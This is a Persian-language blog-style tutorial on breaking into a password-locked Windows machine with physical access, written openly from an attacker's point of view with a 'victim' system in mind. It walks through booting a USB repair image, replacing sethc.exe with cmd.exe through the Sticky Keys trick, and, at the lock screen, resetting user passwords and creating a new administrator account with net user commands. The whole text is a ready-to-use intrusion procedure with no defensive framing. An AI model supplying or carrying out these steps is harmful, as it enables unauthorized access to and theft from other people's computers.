چند ساله که با باگ های سیستم عامل ویندوز سروکله می زنیم ولی یه باگ هست که حدود 25 ساله که فیکس نشده , مهم نیست چه نسخه ای از سیستم عامل ویندوز رو نصب داری از ویندوز 98 و ویندوز سرور 2019 بگیر تا ویندوز 11 سال 2021 همگی تنها با یه فلش و فقط 2 دقیقه وقت هک میشن
شاید فکر کنی که زیاده روی میکنم و یا فکر میکنی صرفا یه پسورد( 16 رقمی ) میتونه سیستمت رو ایمن نگه داره , ولی سخت در اشتباهی
ولی شاید برات این سوال پیش بیاد که سیستم پسورد داره (قفله) پس چطور من cmd رو باز میکنم؟
من میخوام در این مقاله خیلی کامل در باره این مسئله مهم صحبت کنم که چطور منه هکر میتونم دسترسی خط فرمان ویندوز رو مال خودم کنم پس با من همراه باش....
قدم اول باید یک فلش ترجیحا 8 گیگ , رو با استفاده از ابزار ventoy یه IOS ویندوز 10 درست کنیم سپس وارد صفحه بوت سیستم میشیم و الویت بوت رو به فلش واگزار میکنم تا از روی فلش صفحه نصب ویندوزی لود بشه
نکته کنکوری : ابزار ventoy بوت چند گانه درست میکنه یعنی میتونی رو یه فلش چندین ISO سیستم عامل کنار هم داشته باشی ( در آینده حتما یه آموزش جامع در بارش درست میکنم )
قدم دوم صفحه نصب ویندوز برای ما نمایان میشه و طبق مراحل زیر عمل میکنی
روی گزینه Next کلیک میکنیم
سپس گزینه Repair your computer رو انتخاب میکنم
سه گزینه برای ما به نمایش گذاشته میشه روی Troubleshoot کلیک میکنم
البته اینم اضافه کنم رو بعضی از سیستم ها ممکنه گزینه ها متفاوت باشه اما در مجموع ساختار به صورت عکس زیر است
بعد از این که منو Troubleshoot رو پیدا کردیم صفحه Advanced options برای ما نمایان میشه که ما گزینه Command prompt رو انتخاب میکنیم مانند عکس زیر
یه صفحه command prompt برای ما باز میشه
تغریبا command prompt این شکلی است من الان که دارم این مقاله رو می نویسم , دسترسی به ویندوز ندارم چون سیستم عامل اصلی من لینوکس هست نمی توانم عکس مرتبط با دستورات رو برای شمال قرار بدم اما تلاشمو میکنم که دستورات رو خیلی کامل توضیح بدم
قدم به قدم مراحل رو پیش برو
اول باید بفهمیم سیستم عامل ویندوز قربانی روی کدام بخش از هارد نصب شده با استفاده از دستور زیر هارد مورد نظر را پیدا میکنم
diskpart list vol برسی مسیر هارد ویندوز exit خارج میشویم
بعد از این که خروجی کامل list vol رو برسی کردیم و از وجود هارد ویندوز مطمعن شدیم به این شکل وارد هارد مورد نظر میشیم و سپس با نوشتن exit خارج میشویم
مثلا اگر پارتیشن هاردی که مطمعن هشتیم ویندوزه نصب شده D بود به این صورد وارد هارد میشیم
D:
الان ما در هارد ویندوز هستیم و باید در مسیر دایرکتوری مورد نظر مهاجرت کنیم
dir
دستور dir صرفا دایرکتوری ها را به ما نشان میدهد
در اینجا می بینیم که دایرکتوری Windows وجود دارد یعنی ما مسیر رو درست رفتیم
cd Windows/System32
با استفاده از دستور بالا وارد پوشه System32 شدیم
قصد ما برای ورد به پوشه System32 این بود که صرفا ابزار ها را جایگزین CMD یا همان command prompt کنیم تا هرموقع بخوایم بتوانیم cmd را صدا بزنیم
حالا میتونیم ابزار هارا جایگزین cmd کنیم
copy sethc.exe sethc.exe-backup
سپس sethc.exe را حذف میکنیم
del sethc.exe
حالا باید از cmd.exe یه کپی بگیریم
copy cmd.exe sethc.exe
خیلی ساده ما ارور معروف زیر را تبدیل به cmd کریدم
این ارور زمانی اتفاق می افتاد که شما بی دلیل پشت سر هم , دکمه shift یا ctrl رو فشار میدادی
یادتونه , موقع بازی های کامپیوتری اگه زیاد shift رو میزدی این ارور باعث می شد از بازی بپره بیرون
دقیقا ما الان امدیم نمایش این ارور رو با cmd تغییر دادیم کار بسیار هوشمندانه ایه
میتونی حالا با دستور زیر از تغییر sethc.exe به cmd.exe مطمعن بشی
dir sethc*
خیلی ساده ما sethc به cmd تغییر داده شد
خوب حالا با دستور exit از command prompt خارج میشیم و از گزینه های منو choose an option گزینه continue رو انتخاب میکنم
سیستم یه ریست میشه و بازم صفحه قفل ویندوز پیدا میشه
اما این بار با استفاده از باگ ویندوز میتونی cmd رو صدا بزنی میدونی که اگه به cmd دسترسی داشته باشی به همه جای سیستم دسترسی داری 5 بار پشت سرهم دکمه shift رو بزن
خیلی جالبه cmd روی صفحه پسورد سیستم باز میشه
خوب با استفاده از دستور زیر میتونی پسورد user را ریست کنی یا حتی یه user جدید درست کنی و با اون user جدید به کل اطلاعات سیستم قربانی دسترسی داشته باشی
دستور زیر کل اصلاعات user ها را نشان میدهد
net user
دستور زیر user را ریست میکند
net user 'nameuser' *
یا میتونی پسورد رو عوض کنی و یا میتونی پسورد رو با زدن enter خالی بزاری که تا پسورد ریست بشه در انتها با نوشتن دستور logoff پسورد ریست میشود
نکته بعضی وقت ها پسورد ریست نمیشه اما میشه با روش ساخت user administrators به سیستم قربانی دسترسی داشته باشی
میتونی یه user جدید بسازی و با اون user جدید به سیستم قربانی لوگین کنی
net user mehrzero /add
یه حساب کاربری جدید به اسم mehrzero ساخته شد
و در آخر باید به user دسترسی admin بدیم
net localgroup administrators mehrzero /add
و در آخر با استفاده از دستور net user میتونی user هایی که ساختی رو ببینی
net user mehrzero
دستور بالا اطلاعات کامل user که ساختیم رو نشون میده
و در آخر logoff استفاده میکنیم و وارد سیستم عامل میشیم
به همین راحتی ما تونستیم یه دسترسی ترمینالی از ویندوز بگیریم و با استفاده از همون پسورد سیستم رو از بین ببریم
